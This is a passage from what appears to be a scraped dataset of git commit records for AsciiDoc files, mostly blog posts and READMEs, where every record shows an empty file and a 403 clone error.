2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"487a7ecec3de0f80e43baf304488c602e752d689","subject":"y2b create post The $1700 Real Gold iPhone 7","message":"y2b create post The $1700 Real Gold iPhone 7","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-15-The-1700-Real-Gold-iPhone-7.adoc","new_file":"_posts\/2017-04-15-The-1700-Real-Gold-iPhone-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2153c240fb627a3bb684f567860bbdd68bd14da4","subject":"Update 2017-11-30-Episode-119-Gaps-in-Storage.adoc","message":"Update 2017-11-30-Episode-119-Gaps-in-Storage.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-11-30-Episode-119-Gaps-in-Storage.adoc","new_file":"_posts\/2017-11-30-Episode-119-Gaps-in-Storage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a04423b34c7fff736530823f4415966a51969699","subject":"Trapping Ctrl-C","message":"Trapping Ctrl-C\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b8b9a78149b46fc4f5e965d5755e31997d2bcfcc","subject":"README added","message":"README added\n","repos":"mojavelinux\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,abelsromero\/asciidoctor-maven-plugin,NicolasGeraud\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin,asciidoctor\/asciidoctor-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NicolasGeraud\/asciidoctor-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f3f31ae2ee26b62f5a553ab9aaba97b8325c024","subject":"Add the \"building kudu\" section back (deleted in change 1175)","message":"Add the \"building kudu\" section back (deleted in change 1175)\n\nChange-Id: Iaf5e548cba957ef143d95b1bc75008fc237a557b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1180\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9abb3a1b08be534f33c2bbe8b9a030fafc7e997d","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-mock","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-mock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5b5753872dd42c4a3a16ed9d363985d4116c99c","subject":"Polish up file references","message":"Polish up file references\n","repos":"wangcan2014\/tut-bookmarks,Sheparzo\/tut-bookmarks,razordaze\/tut-bookmarks,DongsunPark\/bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7fdbea9fc20812f6b600f4db57481ad67cc759e5","subject":"Update 2015-09-24-AS.adoc","message":"Update 2015-09-24-AS.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-24-AS.adoc","new_file":"_posts\/2015-09-24-AS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2da3d1151d01ddec6ada437c44dc045619aacab2","subject":"Update 2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","message":"Update 2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","new_file":"_posts\/2015-02-12-Setting-up-system-for-ionic-framework-and-android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66202dcf51bdef69e1fdacf12cfb6980c3e7e4c9","subject":"Include missing field-caps docs in search","message":"Include missing field-caps docs in search\n","repos":"masaruh\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elasticassandra,fred84\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,jimczi\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,jimczi\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,pozhidaevak\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/search.asciidoc","new_file":"docs\/reference\/search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2429281c4204af3745b805c56233c24cda5e4d4b","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a43f9f3f3cffe8d74bf271cf9ba120d86c178b27","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d997b702686874f4fea2c6d3dabef4d602d5c0d","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"620aba1ee5fe5eaec0aeb756ff53f1dd30f9e421","subject":"y2b create post Horse Heads \\u0026 RAM Upgrades?! (Deal Therapy)","message":"y2b create post Horse Heads \\u0026 RAM Upgrades?! (Deal Therapy)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-25-Horse-Heads-u0026-RAM-Upgrades-Deal-Therapy.adoc","new_file":"_posts\/2013-04-25-Horse-Heads-u0026-RAM-Upgrades-Deal-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dca63d778a9cb2e90d78af48ea97595607fc517","subject":"docs: KUDU-2411: Document the binary test jar","message":"docs: KUDU-2411: Document the binary test jar\n\nThis patch adds documentation for how to use the Kudu binary test jar.\n\nChange-Id: I8189f1703626587a5313d8c1fb11d046455d9f39\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12685\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ba5fd743b6f887e99f5eee60e62ccc8a58a21f9","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/ukraine.adoc","new_file":"content\/writings\/ukraine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"97d12a5c9c387b85cf4d9f2c903e929c9d024225","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ca62fad91b961f06014d672a8defe5aa8262d5","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d0e87414cf2df47b515578d6aaa58eeb860c87","subject":"Update 2015-09-22-Initialization-and-Cleanup.adoc","message":"Update 2015-09-22-Initialization-and-Cleanup.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_file":"_posts\/2015-09-22-Initialization-and-Cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bab3719279f7cc630e3c808afc246e2a0a6ffd06","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d166d0baf9f2562bb93c79186281682e28103c56","subject":"y2b create post Goodbye iPhone","message":"y2b create post Goodbye iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-15-Goodbye-iPhone.adoc","new_file":"_posts\/2014-09-15-Goodbye-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cf8a5302597efdb2e9b9de5f931f974f9056a69","subject":"Update 2015-07-31-Hitachi-Intern.adoc","message":"Update 2015-07-31-Hitachi-Intern.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-31-Hitachi-Intern.adoc","new_file":"_posts\/2015-07-31-Hitachi-Intern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a6f1f5f8438500a68a5c7c4fec3f4f375c66d3","subject":"y2b create post Just Add Water?","message":"y2b create post Just Add Water?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-15-Just-Add-Water.adoc","new_file":"_posts\/2016-04-15-Just-Add-Water.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea77d63eb7d9b9263c1644ece5697f2920c5105","subject":"add a browser_tools file","message":"add a browser_tools file\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Browser_Tools.adoc","new_file":"Browser_Tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"0979aee6de34824f444642373db757dda7237df2","subject":"Update 2015-07-14-Test-Post.adoc","message":"Update 2015-07-14-Test-Post.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-14-Test-Post.adoc","new_file":"_posts\/2015-07-14-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bcf945a6e2cd900305383edf50a4804e241f097","subject":"Update 2015-11-15-Comunidad.adoc","message":"Update 2015-11-15-Comunidad.adoc","repos":"lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io","old_file":"_posts\/2015-11-15-Comunidad.adoc","new_file":"_posts\/2015-11-15-Comunidad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasferraro\/lucasferraro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef9240944c4afc79e87f1bee5373978a4b1bbd7e","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2a7fa4e5724216ae6c45414ec84d2adf171517e","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13dd96c227766c0f2cda012cf7fd9c4cc7a38179","subject":"Delete Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","message":"Delete Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9257b1675569dc31070f482d106ae0529b14c38","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16d2c72459a8a1b30d3b25074fef84114aac218b","subject":"Update 2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","message":"Update 2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","repos":"rdspring1\/rdspring1.github.io,rdspring1\/rdspring1.github.io,rdspring1\/rdspring1.github.io,rdspring1\/rdspring1.github.io","old_file":"_posts\/2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","new_file":"_posts\/2016-06-21-Neural-Turing-Machine-Fizz-Buzz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdspring1\/rdspring1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b60f601290e95c401fc8f4b9e9a9f0bd5c458e7","subject":"Update 2016-01-12-This-is-a-test-post-Number-1.adoc","message":"Update 2016-01-12-This-is-a-test-post-Number-1.adoc","repos":"vadio\/vadio.github.io,vadio\/vadio.github.io,vadio\/vadio.github.io","old_file":"_posts\/2016-01-12-This-is-a-test-post-Number-1.adoc","new_file":"_posts\/2016-01-12-This-is-a-test-post-Number-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vadio\/vadio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e32902bce35f0c769c32d52f390070ca6208ea3","subject":"Update 2016-03-01-More-magic-coming-to-MyMagic.adoc","message":"Update 2016-03-01-More-magic-coming-to-MyMagic.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-01-More-magic-coming-to-MyMagic.adoc","new_file":"_posts\/2016-03-01-More-magic-coming-to-MyMagic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"039e9c035f52769eebdda31c9c6adc4343456943","subject":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","message":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7e9d81073ad90ac635fe50ff1beb96b59951f3a","subject":"userdocumentation and extractes set version api","message":"userdocumentation and extractes set version api\n","repos":"moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan","old_file":"leguan-server\/src\/main\/docs\/serverInstallation.adoc","new_file":"leguan-server\/src\/main\/docs\/serverInstallation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moley\/leguan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"068e6a28bbb3616aba3ccb4a42555532bd0e6e0b","subject":"job #12373 add implementation note","message":"job #12373 add implementation 